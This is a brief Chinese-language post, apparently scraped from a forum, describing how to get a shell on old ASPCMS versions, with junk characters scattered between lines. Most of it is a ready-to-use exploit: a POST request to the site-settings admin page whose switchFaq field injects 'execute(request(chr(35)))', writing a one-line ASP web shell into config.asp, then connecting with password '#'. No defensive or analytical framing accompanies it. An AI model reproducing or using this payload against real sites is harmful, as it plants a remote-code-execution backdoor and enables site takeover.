老的ASPCMS版本的秒杀拿SHELL漏洞
5 H* D( o% D1 s2 _2 l( {+ d' _% s% ~, P# E- e( N" k
找到后台。。。然后
! }# @! k' y/ D% ^
- C. s5 x2 J! h. l( G5 B/admin/_system/AspCms_SiteSetting.asp?action=saves
, j+ [' r' X) q5 a8 J/ [
8 j4 T! q: s- O2 n直接POST
- [* S/ F9 D7 x! S+ k; g ; d" P" u8 V& {3 c) L9 D
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1( w7 ~' O% L# ]/ p
: o* ]( E- [7 f& J
再连接配置文件config.asp 密码为#
$ s2 t$ l9 M! h" L |